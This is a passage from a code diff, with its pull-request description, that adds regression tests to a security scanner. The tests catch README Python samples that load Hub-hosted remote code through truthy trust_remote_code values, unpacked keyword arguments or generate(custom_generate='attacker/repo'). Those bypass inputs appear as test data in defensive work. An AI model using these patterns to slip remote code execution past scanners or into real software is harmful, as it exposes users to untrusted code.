         assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "generate_argument",
+        [
+            "custom_generate='attacker/repo'",
+            "custom_generate='attacker/repo', trust_remote_code=True",
+            "**{'custom_generate': 'attacker/repo'}",
+            "**{'trust_remote_code': True}",
+        ],
+    )
+    def test_readme_python_example_rejects_remote_code_through_generate(
+        self,
+        generate_argument: str,
+    ) -> None:
+        """`from_pretrained` is not the only call that loads remote code.
+
+        Since Transformers 4.55 `generate(custom_generate=...)` downloads and executes Hub-hosted
+        Python, and `generate` is a documented call, so gating only `from_pretrained` left the
+        suppression reachable through it.
+        """
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"model.generate({generate_argument})\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_allows_documented_generate_kwargs_unpacking(self) -> None:
+        """`model.generate(**inputs)` is the canonical documented pattern and must stay benign."""
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"inputs = {'input_ids': 1}\n"
+            b"model.generate(**inputs)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     def test_readme_python_example_allows_explicitly_disabled_remote_code_trust(self) -> None:
         data = (

--- a/tests/scanners/test_text_scanner.py
+++ b/tests/scanners/test_text_scanner.py
@@ -460,6 +460,27 @@ def test_text_scanner_readme_plain_http_sample_image_stays_actionable(tmp_path: 
     )
 
 
+def test_text_scanner_readme_remote_code_trust_stays_actionable(tmp_path: Path) -> None:
+    text_path = tmp_path / "README.md"
+    text_path.write_text(
+        "```python\nimport requests\nfrom transformers import AutoModel\n"
+        "image_url = 'https://huggingface.co/spaces/org/demo/resolve/main/image.png'\n"
+        "AutoModel.from_pretrained('attacker/model', trust_remote_code=1)\n"
+        "requests.get(image_url, stream=True)\n```\n",
+        encoding="utf-8",
+    )
+
+    result = TextScanner().scan(str(text_path))
+
+    assert result.success is False
+    assert any(
+        check.name == "Network Communication Detection"
+        and check.status == CheckStatus.FAILED
+        and check.details.get("type") == "network_function"
+        for check in result.checks
+    )
+
+
 @pytest.mark.parametrize(
     ("filename", "command"),
     [


### PR DESCRIPTION
## Summary
- reject truthy, computed, or unpacked `trust_remote_code` values before suppressing README network findings
- preserve the benign `trust_remote_code=False` model-card example
- add detector regressions for six bypass variants and an end-to-end text-scanner regression

## Security impact
A newly merged README image-download allowlist rejected only literal `trust_remote_code=True`. Equivalent truthy values and unpacked keyword arguments silently suppressed network findings around Transformers calls capable of executing remote repository code.

## Validation
- `1298 passed, 1 deselected`: complete network detector and text scanner suites, excluding the external Hugging Face integration test
- `332 passed, 6 skipped`: cache correctness and release workflow regression suites
- repository-wide Ruff lint and format checks
- changed-file mypy and CHANGELOG Prettier checks
- failing-first reproduction: all six malicious variants failed before the fix; the explicit `False` control passed